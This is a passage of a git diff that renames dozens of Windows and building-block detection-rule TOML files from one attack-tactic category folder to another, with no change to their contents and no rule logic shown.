rename to rules/windows/credential_access_smb_rare_destination.toml
diff --git a/rules/windows/lateral_movement_alternate_creds_pth.toml b/rules/windows/defense_evasion_alternate_creds_pth.toml
similarity index 100%
rename from rules/windows/lateral_movement_alternate_creds_pth.toml
rename to rules/windows/defense_evasion_alternate_creds_pth.toml
diff --git a/rules/windows/execution_com_object_xwizard.toml b/rules/windows/defense_evasion_com_object_xwizard.toml
similarity index 100%
rename from rules/windows/execution_com_object_xwizard.toml
rename to rules/windows/defense_evasion_com_object_xwizard.toml
diff --git a/rules/windows/execution_command_shell_via_rundll32.toml b/rules/windows/defense_evasion_command_shell_via_rundll32.toml
similarity index 100%
rename from rules/windows/execution_command_shell_via_rundll32.toml
rename to rules/windows/defense_evasion_command_shell_via_rundll32.toml
diff --git a/rules/windows/privilege_escalation_create_process_as_different_user.toml b/rules/windows/defense_evasion_create_process_as_different_user.toml
similarity index 100%
rename from rules/windows/privilege_escalation_create_process_as_different_user.toml
rename to rules/windows/defense_evasion_create_process_as_different_user.toml
diff --git a/rules/windows/privilege_escalation_create_process_with_token_unpriv.toml b/rules/windows/defense_evasion_create_process_with_token_unpriv.toml
similarity index 100%
rename from rules/windows/privilege_escalation_create_process_with_token_unpriv.toml
rename to rules/windows/defense_evasion_create_process_with_token_unpriv.toml
diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/defense_evasion_dcom_mmc20.toml
similarity index 100%
rename from rules/windows/lateral_movement_dcom_mmc20.toml
rename to rules/windows/defense_evasion_dcom_mmc20.toml
diff --git a/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/defense_evasion_delayed_via_ping_lolbas_unsigned.toml
similarity index 100%
rename from rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml
rename to rules/windows/defense_evasion_delayed_via_ping_lolbas_unsigned.toml
diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/defense_evasion_disable_uac_registry.toml
similarity index 100%
rename from rules/windows/privilege_escalation_disable_uac_registry.toml
rename to rules/windows/defense_evasion_disable_uac_registry.toml
diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/defense_evasion_evasion_hidden_local_account_creation.toml
similarity index 100%
rename from rules/windows/persistence_evasion_hidden_local_account_creation.toml
rename to rules/windows/defense_evasion_evasion_hidden_local_account_creation.toml
diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/defense_evasion_evasion_registry_startup_shell_folder_modified.toml
similarity index 100%
rename from rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml
rename to rules/windows/defense_evasion_evasion_registry_startup_shell_folder_modified.toml
diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/defense_evasion_evasion_suspicious_htm_file_creation.toml
similarity index 100%
rename from rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml
rename to rules/windows/defense_evasion_evasion_suspicious_htm_file_creation.toml
diff --git a/rules/windows/privilege_escalation_expired_driver_loaded.toml b/rules/windows/defense_evasion_expired_driver_loaded.toml
similarity index 100%
rename from rules/windows/privilege_escalation_expired_driver_loaded.toml
rename to rules/windows/defense_evasion_expired_driver_loaded.toml
diff --git a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml b/rules/windows/defense_evasion_exploit_jetbrains_teamcity.toml
similarity index 100%
rename from rules/windows/initial_access_exploit_jetbrains_teamcity.toml
rename to rules/windows/defense_evasion_exploit_jetbrains_teamcity.toml
diff --git a/rules/windows/execution_from_unusual_path_cmdline.toml b/rules/windows/defense_evasion_from_unusual_path_cmdline.toml
similarity index 100%
rename from rules/windows/execution_from_unusual_path_cmdline.toml
rename to rules/windows/defense_evasion_from_unusual_path_cmdline.toml
diff --git a/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/defense_evasion_html_help_executable_program_connecting_to_the_internet.toml
similarity index 100%
rename from rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
rename to rules/windows/defense_evasion_html_help_executable_program_connecting_to_the_internet.toml
diff --git a/rules/windows/privilege_escalation_krbrelayup_service_creation.toml b/rules/windows/defense_evasion_krbrelayup_service_creation.toml
similarity index 100%
rename from rules/windows/privilege_escalation_krbrelayup_service_creation.toml
rename to rules/windows/defense_evasion_krbrelayup_service_creation.toml
diff --git a/rules/windows/privilege_escalation_make_token_local.toml b/rules/windows/defense_evasion_make_token_local.toml
similarity index 100%
rename from rules/windows/privilege_escalation_make_token_local.toml
rename to rules/windows/defense_evasion_make_token_local.toml
diff --git a/rules/windows/persistence_msi_installer_task_startup.toml b/rules/windows/defense_evasion_msi_installer_task_startup.toml
similarity index 100%
rename from rules/windows/persistence_msi_installer_task_startup.toml
rename to rules/windows/defense_evasion_msi_installer_task_startup.toml
diff --git a/rules/windows/privilege_escalation_newcreds_logon_rare_process.toml b/rules/windows/defense_evasion_newcreds_logon_rare_process.toml
similarity index 100%
rename from rules/windows/privilege_escalation_newcreds_logon_rare_process.toml
rename to rules/windows/defense_evasion_newcreds_logon_rare_process.toml
diff --git a/rules/windows/execution_posh_portable_executable.toml b/rules/windows/defense_evasion_posh_portable_executable.toml
similarity index 100%
rename from rules/windows/execution_posh_portable_executable.toml
rename to rules/windows/defense_evasion_posh_portable_executable.toml
diff --git a/rules/windows/privilege_escalation_posh_token_impersonation.toml b/rules/windows/defense_evasion_posh_token_impersonation.toml
similarity index 100%
rename from rules/windows/privilege_escalation_posh_token_impersonation.toml
rename to rules/windows/defense_evasion_posh_token_impersonation.toml
diff --git a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml b/rules/windows/defense_evasion_potential_webhelpdesk_exploit.toml
similarity index 100%
rename from rules/windows/initial_access_potential_webhelpdesk_exploit.toml
rename to rules/windows/defense_evasion_potential_webhelpdesk_exploit.toml
diff --git a/rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml b/rules/windows/defense_evasion_printspooler_suspicious_file_deletion.toml
similarity index 100%
rename from rules/windows/privilege_escalation_printspooler_suspicious_file_deletion.toml
rename to rules/windows/defense_evasion_printspooler_suspicious_file_deletion.toml
diff --git a/rules/windows/lateral_movement_rdp_enabled_registry.toml b/rules/windows/defense_evasion_rdp_enabled_registry.toml
similarity index 100%
rename from rules/windows/lateral_movement_rdp_enabled_registry.toml
rename to rules/windows/defense_evasion_rdp_enabled_registry.toml
diff --git a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml b/rules/windows/defense_evasion_register_server_program_connecting_to_the_internet.toml
similarity index 100%
rename from rules/windows/execution_register_server_program_connecting_to_the_internet.toml
rename to rules/windows/defense_evasion_register_server_program_connecting_to_the_internet.toml
diff --git a/rules/windows/persistence_sdprop_exclusion_dsheuristics.toml b/rules/windows/defense_evasion_sdprop_exclusion_dsheuristics.toml
similarity index 100%
rename from rules/windows/persistence_sdprop_exclusion_dsheuristics.toml
rename to rules/windows/defense_evasion_sdprop_exclusion_dsheuristics.toml
diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/defense_evasion_services_registry.toml
similarity index 100%
rename from rules/windows/persistence_services_registry.toml
rename to rules/windows/defense_evasion_services_registry.toml
diff --git a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml b/rules/windows/defense_evasion_suspicious_execution_from_vscode_extension.toml
similarity index 100%
rename from rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml
rename to rules/windows/defense_evasion_suspicious_execution_from_vscode_extension.toml
diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/defense_evasion_suspicious_ms_office_child_process.toml
similarity index 100%
rename from rules/windows/initial_access_suspicious_ms_office_child_process.toml
rename to rules/windows/defense_evasion_suspicious_ms_office_child_process.toml
diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/defense_evasion_suspicious_psexesvc.toml
similarity index 100%
rename from rules/windows/execution_suspicious_psexesvc.toml
rename to rules/windows/defense_evasion_suspicious_psexesvc.toml
diff --git a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml b/rules/windows/defense_evasion_suspicious_windows_server_update_svc.toml
similarity index 100%
rename from rules/windows/initial_access_suspicious_windows_server_update_svc.toml
rename to rules/windows/defense_evasion_suspicious_windows_server_update_svc.toml
diff --git a/rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml b/rules/windows/defense_evasion_tokenmanip_sedebugpriv_enabled.toml
similarity index 100%
rename from rules/windows/privilege_escalation_tokenmanip_sedebugpriv_enabled.toml
rename to rules/windows/defense_evasion_tokenmanip_sedebugpriv_enabled.toml
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/defense_evasion_uac_bypass_com_clipup.toml
similarity index 100%
rename from rules/windows/privilege_escalation_uac_bypass_com_clipup.toml
rename to rules/windows/defense_evasion_uac_bypass_com_clipup.toml
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml b/rules/windows/defense_evasion_uac_bypass_com_ieinstal.toml
similarity index 100%
rename from rules/windows/privilege_escalation_uac_bypass_com_ieinstal.toml
rename to rules/windows/defense_evasion_uac_bypass_com_ieinstal.toml
diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/defense_evasion_uac_bypass_com_interface_icmluautil.toml
similarity index 100%
rename from rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml
rename to rules/windows/defense_evasion_uac_bypass_com_interface_icmluautil.toml
diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/defense_evasion_uac_bypass_diskcleanup_hijack.toml
similarity index 100%
rename from rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml
rename to rules/windows/defense_evasion_uac_bypass_diskcleanup_hijack.toml
diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/defense_evasion_uac_bypass_dll_sideloading.toml
similarity index 100%
rename from rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml
rename to rules/windows/defense_evasion_uac_bypass_dll_sideloading.toml
diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/defense_evasion_uac_bypass_event_viewer.toml
similarity index 100%
rename from rules/windows/privilege_escalation_uac_bypass_event_viewer.toml
rename to rules/windows/defense_evasion_uac_bypass_event_viewer.toml
diff --git a/rules/windows/privilege_escalation_uac_bypass_mock_windir.toml b/rules/windows/defense_evasion_uac_bypass_mock_windir.toml
similarity index 100%
rename from rules/windows/privilege_escalation_uac_bypass_mock_windir.toml
rename to rules/windows/defense_evasion_uac_bypass_mock_windir.toml
diff --git a/rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml b/rules/windows/defense_evasion_uac_bypass_winfw_mmc_hijack.toml
similarity index 100%
rename from rules/windows/privilege_escalation_uac_bypass_winfw_mmc_hijack.toml
rename to rules/windows/defense_evasion_uac_bypass_winfw_mmc_hijack.toml
diff --git a/rules/windows/privilege_escalation_unusual_parentchild_relationship.toml b/rules/windows/defense_evasion_unusual_parentchild_relationship.toml
similarity index 100%
rename from rules/windows/privilege_escalation_unusual_parentchild_relationship.toml
rename to rules/windows/defense_evasion_unusual_parentchild_relationship.toml
diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/defense_evasion_unusual_svchost_childproc_childless.toml
similarity index 100%
rename from rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml
rename to rules/windows/defense_evasion_unusual_svchost_childproc_childless.toml
diff --git a/rules/windows/initial_access_url_cve_2025_33053.toml b/rules/windows/defense_evasion_url_cve_2025_33053.toml
similarity index 100%
rename from rules/windows/initial_access_url_cve_2025_33053.toml
rename to rules/windows/defense_evasion_url_cve_2025_33053.toml
diff --git a/rules/windows/persistence_via_bits_job_notify_command.toml b/rules/windows/defense_evasion_via_bits_job_notify_command.toml
similarity index 100%
rename from rules/windows/persistence_via_bits_job_notify_command.toml
rename to rules/windows/defense_evasion_via_bits_job_notify_command.toml
diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/defense_evasion_via_compiled_html_file.toml
similarity index 100%
rename from rules/windows/execution_via_compiled_html_file.toml
rename to rules/windows/defense_evasion_via_compiled_html_file.toml
diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/defense_evasion_via_hidden_run_key_valuename.toml
similarity index 100%
rename from rules/windows/persistence_via_hidden_run_key_valuename.toml
rename to rules/windows/defense_evasion_via_hidden_run_key_valuename.toml
diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/defense_evasion_via_hidden_shell_conhost.toml
similarity index 100%
rename from rules/windows/execution_via_hidden_shell_conhost.toml
rename to rules/windows/defense_evasion_via_hidden_shell_conhost.toml
diff --git a/rules/windows/execution_via_mmc_console_file_unusual_path.toml b/rules/windows/defense_evasion_via_mmc_console_file_unusual_path.toml
similarity index 100%
rename from rules/windows/execution_via_mmc_console_file_unusual_path.toml
rename to rules/windows/defense_evasion_via_mmc_console_file_unusual_path.toml
diff --git a/rules/windows/privilege_escalation_via_token_theft.toml b/rules/windows/defense_evasion_via_token_theft.toml
similarity index 100%
rename from rules/windows/privilege_escalation_via_token_theft.toml
rename to rules/windows/defense_evasion_via_token_theft.toml
diff --git a/rules/windows/execution_windows_cmd_shell_susp_args.toml b/rules/windows/defense_evasion_windows_cmd_shell_susp_args.toml
similarity index 100%
rename from rules/windows/execution_windows_cmd_shell_susp_args.toml
rename to rules/windows/defense_evasion_windows_cmd_shell_susp_args.toml
diff --git a/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml b/rules/windows/defense_evasion_windows_fakecaptcha_cmd_ps.toml
similarity index 100%
rename from rules/windows/execution_windows_fakecaptcha_cmd_ps.toml
rename to rules/windows/defense_evasion_windows_fakecaptcha_cmd_ps.toml
diff --git a/rules/windows/execution_windows_powershell_susp_args.toml b/rules/windows/defense_evasion_windows_powershell_susp_args.toml
similarity index 100%
rename from rules/windows/execution_windows_powershell_susp_args.toml
rename to rules/windows/defense_evasion_windows_powershell_susp_args.toml
diff --git a/rules/windows/execution_windows_script_from_internet.toml b/rules/windows/defense_evasion_windows_script_from_internet.toml
similarity index 100%
rename from rules/windows/execution_windows_script_from_internet.toml
rename to rules/windows/defense_evasion_windows_script_from_internet.toml
diff --git a/rules/windows/initial_access_xsl_script_execution_via_com.toml b/rules/windows/defense_evasion_xsl_script_execution_via_com.toml
similarity index 100%
rename from rules/windows/initial_access_xsl_script_execution_via_com.toml
rename to rules/windows/defense_evasion_xsl_script_execution_via_com.toml
diff --git a/rules/windows/execution_enumeration_via_wmiprvse.toml b/rules/windows/discovery_enumeration_via_wmiprvse.toml
similarity index 100%
rename from rules/windows/execution_enumeration_via_wmiprvse.toml
rename to rules/windows/discovery_enumeration_via_wmiprvse.toml
diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/execution_cmd_service.toml
similarity index 100%
rename from rules/windows/lateral_movement_cmd_service.toml
rename to rules/windows/execution_cmd_service.toml
diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/execution_dcom_shellwindow_shellbrowserwindow.toml
similarity index 100%
rename from rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml
rename to rules/windows/execution_dcom_shellwindow_shellbrowserwindow.toml
diff --git a/rules/windows/privilege_escalation_group_policy_scheduled_task.toml b/rules/windows/execution_group_policy_scheduled_task.toml
similarity index 100%
rename from rules/windows/privilege_escalation_group_policy_scheduled_task.toml
rename to rules/windows/execution_group_policy_scheduled_task.toml
diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/execution_incoming_wmi.toml
similarity index 100%
rename from rules/windows/lateral_movement_incoming_wmi.toml
rename to rules/windows/execution_incoming_wmi.toml
diff --git a/rules/windows/initial_access_rdp_file_mail_attachment.toml b/rules/windows/execution_rdp_file_mail_attachment.toml
similarity index 100%
rename from rules/windows/initial_access_rdp_file_mail_attachment.toml
rename to rules/windows/execution_rdp_file_mail_attachment.toml
diff --git a/rules/windows/lateral_movement_remote_services.toml b/rules/windows/execution_remote_services.toml
similarity index 100%
rename from rules/windows/lateral_movement_remote_services.toml
rename to rules/windows/execution_remote_services.toml
diff --git a/rules/windows/lateral_movement_remote_task_creation_winlog.toml b/rules/windows/execution_remote_task_creation_winlog.toml
similarity index 100%
rename from rules/windows/lateral_movement_remote_task_creation_winlog.toml
rename to rules/windows/execution_remote_task_creation_winlog.toml
diff --git a/rules/windows/lateral_movement_scheduled_task_target.toml b/rules/windows/execution_scheduled_task_target.toml
similarity index 100%
rename from rules/windows/lateral_movement_scheduled_task_target.toml
rename to rules/windows/execution_scheduled_task_target.toml
diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/execution_script_executing_powershell.toml
similarity index 100%
rename from rules/windows/initial_access_script_executing_powershell.toml
rename to rules/windows/execution_script_executing_powershell.toml
diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/execution_scripts_process_started_via_wmi.toml
similarity index 100%
rename from rules/windows/initial_access_scripts_process_started_via_wmi.toml
rename to rules/windows/execution_scripts_process_started_via_wmi.toml
diff --git a/rules/windows/privilege_escalation_service_control_spawned_script_int.toml b/rules/windows/execution_service_control_spawned_script_int.toml
similarity index 100%
rename from rules/windows/privilege_escalation_service_control_spawned_script_int.toml
rename to rules/windows/execution_service_control_spawned_script_int.toml
diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/execution_suspicious_ms_exchange_worker_child_process.toml
similarity index 100%
rename from rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml
rename to rules/windows/execution_suspicious_ms_exchange_worker_child_process.toml
diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/execution_suspicious_ms_outlook_child_process.toml
similarity index 100%
rename from rules/windows/initial_access_suspicious_ms_outlook_child_process.toml
rename to rules/windows/execution_suspicious_ms_outlook_child_process.toml
diff --git a/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml b/rules/windows/execution_suspicious_process_access_direct_syscall.toml
similarity index 100%
rename from rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml
rename to rules/windows/execution_suspicious_process_access_direct_syscall.toml
diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/execution_suspicious_scheduled_task_runtime.toml
similarity index 100%
rename from rules/windows/persistence_suspicious_scheduled_task_runtime.toml
rename to rules/windows/execution_suspicious_scheduled_task_runtime.toml
diff --git a/rules/windows/defense_evasion_suspicious_zoom_child_process.toml b/rules/windows/execution_suspicious_zoom_child_process.toml
similarity index 100%
rename from rules/windows/defense_evasion_suspicious_zoom_child_process.toml
rename to rules/windows/execution_suspicious_zoom_child_process.toml
diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/execution_system_shells_via_services.toml
similarity index 100%
rename from rules/windows/persistence_system_shells_via_services.toml
rename to rules/windows/execution_system_shells_via_services.toml
diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/execution_temp_scheduled_task.toml
similarity index 100%
rename from rules/windows/persistence_temp_scheduled_task.toml
rename to rules/windows/execution_temp_scheduled_task.toml
diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/execution_via_explorer_suspicious_child_parent_args.toml
similarity index 100%
rename from rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml
rename to rules/windows/execution_via_explorer_suspicious_child_parent_args.toml
diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/execution_via_wmi_stdregprov_run_services.toml
similarity index 100%
rename from rules/windows/persistence_via_wmi_stdregprov_run_services.toml
rename to rules/windows/execution_via_wmi_stdregprov_run_services.toml
diff --git a/rules/windows/lateral_movement_via_wsus_update.toml b/rules/windows/execution_via_wsus_update.toml
similarity index 100%
rename from rules/windows/lateral_movement_via_wsus_update.toml
rename to rules/windows/execution_via_wsus_update.toml
diff --git a/rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml b/rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml
similarity index 100%
rename from rules/windows/persistence_via_xp_cmdshell_mssql_stored_procedure.toml
rename to rules/windows/execution_via_xp_cmdshell_mssql_stored_procedure.toml
diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/execution_volume_shadow_copy_deletion_via_powershell.toml
similarity index 100%
rename from rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml
rename to rules/windows/execution_volume_shadow_copy_deletion_via_powershell.toml
diff --git a/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/execution_volume_shadow_copy_deletion_via_wmic.toml
similarity index 100%
rename from rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml
rename to rules/windows/execution_volume_shadow_copy_deletion_via_wmic.toml
diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/execution_webshell_detection.toml
similarity index 100%
rename from rules/windows/persistence_webshell_detection.toml
rename to rules/windows/execution_webshell_detection.toml
diff --git a/rules/windows/initial_access_webshell_screenconnect_server.toml b/rules/windows/execution_webshell_screenconnect_server.toml
similarity index 100%
rename from rules/windows/initial_access_webshell_screenconnect_server.toml
rename to rules/windows/execution_webshell_screenconnect_server.toml
diff --git a/rules/windows/defense_evasion_wsl_bash_exec.toml b/rules/windows/execution_wsl_bash_exec.toml
similarity index 100%
rename from rules/windows/defense_evasion_wsl_bash_exec.toml
rename to rules/windows/execution_wsl_bash_exec.toml
diff --git a/rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml b/rules/windows/initial_access_account_takeover_mixed_logon_types.toml
similarity index 100%
rename from rules/windows/privilege_escalation_account_takeover_mixed_logon_types.toml
rename to rules/windows/initial_access_account_takeover_mixed_logon_types.toml
diff --git a/rules/windows/execution_downloaded_shortcut_files.toml b/rules/windows/initial_access_downloaded_shortcut_files.toml
similarity index 100%
rename from rules/windows/execution_downloaded_shortcut_files.toml
rename to rules/windows/initial_access_downloaded_shortcut_files.toml
diff --git a/rules/windows/execution_downloaded_url_file.toml b/rules/windows/initial_access_downloaded_url_file.toml
similarity index 100%
rename from rules/windows/execution_downloaded_url_file.toml
rename to rules/windows/initial_access_downloaded_url_file.toml
diff --git a/rules/windows/privilege_escalation_takeover_new_source_ip.toml b/rules/windows/initial_access_takeover_new_source_ip.toml
similarity index 100%
rename from rules/windows/privilege_escalation_takeover_new_source_ip.toml
rename to rules/windows/initial_access_takeover_new_source_ip.toml
diff --git a/rules/windows/lateral_movement_unusual_dns_service_children.toml b/rules/windows/initial_access_unusual_dns_service_children.toml
similarity index 100%
rename from rules/windows/lateral_movement_unusual_dns_service_children.toml
rename to rules/windows/initial_access_unusual_dns_service_children.toml
diff --git a/rules/windows/lateral_movement_unusual_dns_service_file_writes.toml b/rules/windows/initial_access_unusual_dns_service_file_writes.toml
similarity index 100%
rename from rules/windows/lateral_movement_unusual_dns_service_file_writes.toml
rename to rules/windows/initial_access_unusual_dns_service_file_writes.toml
diff --git a/rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml b/rules/windows/persistence_badsuccessor_dmsa_abuse.toml
similarity index 100%
rename from rules/windows/privilege_escalation_badsuccessor_dmsa_abuse.toml
rename to rules/windows/persistence_badsuccessor_dmsa_abuse.toml
diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/persistence_credroaming_ldap.toml
similarity index 100%
rename from rules/windows/privilege_escalation_credroaming_ldap.toml
rename to rules/windows/persistence_credroaming_ldap.toml
diff --git a/rules/windows/credential_access_dcsync_user_backdoor.toml b/rules/windows/persistence_dcsync_user_backdoor.toml
similarity index 100%
rename from rules/windows/credential_access_dcsync_user_backdoor.toml
rename to rules/windows/persistence_dcsync_user_backdoor.toml
diff --git a/rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml b/rules/windows/persistence_dmsa_creation_by_unusual_user.toml
similarity index 100%
rename from rules/windows/privilege_escalation_dmsa_creation_by_unusual_user.toml
rename to rules/windows/persistence_dmsa_creation_by_unusual_user.toml
diff --git a/rules/windows/privilege_escalation_dns_serverlevelplugindll.toml b/rules/windows/persistence_dns_serverlevelplugindll.toml
similarity index 100%
rename from rules/windows/privilege_escalation_dns_serverlevelplugindll.toml
rename to rules/windows/persistence_dns_serverlevelplugindll.toml
diff --git a/rules/windows/privilege_escalation_gpo_schtask_service_creation.toml b/rules/windows/persistence_gpo_schtask_service_creation.toml
similarity index 100%
rename from rules/windows/privilege_escalation_gpo_schtask_service_creation.toml
rename to rules/windows/persistence_gpo_schtask_service_creation.toml
diff --git a/rules/windows/privilege_escalation_group_policy_iniscript.toml b/rules/windows/persistence_group_policy_iniscript.toml
similarity index 100%
rename from rules/windows/privilege_escalation_group_policy_iniscript.toml
rename to rules/windows/persistence_group_policy_iniscript.toml
diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/persistence_lsa_auth_package.toml
similarity index 100%
rename from rules/windows/privilege_escalation_lsa_auth_package.toml
rename to rules/windows/persistence_lsa_auth_package.toml
diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/persistence_lsass_loaded_susp_dll.toml
similarity index 100%
rename from rules/windows/credential_access_lsass_loaded_susp_dll.toml
rename to rules/windows/persistence_lsass_loaded_susp_dll.toml
diff --git a/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml b/rules/windows/persistence_masquerading_suspicious_werfault_childproc.toml
similarity index 100%
rename from rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml
rename to rules/windows/persistence_masquerading_suspicious_werfault_childproc.toml
diff --git a/rules/windows/command_and_control_outlook_home_page.toml b/rules/windows/persistence_outlook_home_page.toml
similarity index 100%
rename from rules/windows/command_and_control_outlook_home_page.toml
rename to rules/windows/persistence_outlook_home_page.toml
diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/persistence_port_monitor_print_processor_abuse.toml
similarity index 100%
rename from rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml
rename to rules/windows/persistence_port_monitor_print_processor_abuse.toml
diff --git a/rules/windows/privilege_escalation_reg_service_imagepath_mod.toml b/rules/windows/persistence_reg_service_imagepath_mod.toml
similarity index 100%
rename from rules/windows/privilege_escalation_reg_service_imagepath_mod.toml
rename to rules/windows/persistence_reg_service_imagepath_mod.toml
diff --git a/rules/windows/defense_evasion_regmod_remotemonologue.toml b/rules/windows/persistence_regmod_remotemonologue.toml
similarity index 100%
rename from rules/windows/defense_evasion_regmod_remotemonologue.toml
rename to rules/windows/persistence_regmod_remotemonologue.toml
diff --git a/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml b/rules/windows/persistence_scheduledjobs_at_protocol_enabled.toml
similarity index 100%
rename from rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml
rename to rules/windows/persistence_scheduledjobs_at_protocol_enabled.toml
diff --git a/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/persistence_seenabledelegationprivilege_assigned_to_user.toml
similarity index 100%
rename from rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
rename to rules/windows/persistence_seenabledelegationprivilege_assigned_to_user.toml
diff --git a/rules/windows/credential_access_shadow_credentials.toml b/rules/windows/persistence_shadow_credentials.toml
similarity index 100%
rename from rules/windows/credential_access_shadow_credentials.toml
rename to rules/windows/persistence_shadow_credentials.toml
diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/persistence_shared_modules_local_sxs_dll.toml
similarity index 100%
rename from rules/windows/execution_shared_modules_local_sxs_dll.toml
rename to rules/windows/persistence_shared_modules_local_sxs_dll.toml
diff --git a/rules/windows/credential_access_spn_attribute_modified.toml b/rules/windows/persistence_spn_attribute_modified.toml
similarity index 100%
rename from rules/windows/credential_access_spn_attribute_modified.toml
rename to rules/windows/persistence_spn_attribute_modified.toml
diff --git a/rules/windows/privilege_escalation_windows_service_via_unusual_client.toml b/rules/windows/persistence_windows_service_via_unusual_client.toml
similarity index 100%
rename from rules/windows/privilege_escalation_windows_service_via_unusual_client.toml
rename to rules/windows/persistence_windows_service_via_unusual_client.toml
diff --git a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml b/rules_building_block/collection_github_new_repo_interaction_for_pat.toml
similarity index 100%
rename from rules_building_block/execution_github_new_repo_interaction_for_pat.toml
rename to rules_building_block/collection_github_new_repo_interaction_for_pat.toml
diff --git a/rules_building_block/execution_github_new_repo_interaction_for_user.toml b/rules_building_block/collection_github_new_repo_interaction_for_user.toml
similarity index 100%
rename from rules_building_block/execution_github_new_repo_interaction_for_user.toml
rename to rules_building_block/collection_github_new_repo_interaction_for_user.toml
diff --git a/rules_building_block/execution_github_repo_interaction_from_new_ip.toml b/rules_building_block/collection_github_repo_interaction_from_new_ip.toml
similarity index 100%
rename from rules_building_block/execution_github_repo_interaction_from_new_ip.toml
rename to rules_building_block/collection_github_repo_interaction_from_new_ip.toml
diff --git a/rules_building_block/discovery_capnetraw_capability.toml b/rules_building_block/credential_access_capnetraw_capability.toml
similarity index 100%
rename from rules_building_block/discovery_capnetraw_capability.toml
rename to rules_building_block/credential_access_capnetraw_capability.toml
diff --git a/rules_building_block/initial_access_okta_admin_console_login_failure.toml b/rules_building_block/credential_access_okta_admin_console_login_failure.toml
similarity index 100%
rename from rules_building_block/initial_access_okta_admin_console_login_failure.toml
rename to rules_building_block/credential_access_okta_admin_console_login_failure.toml
diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/defense_evasion_bitsadmin_activity.toml
similarity index 100%
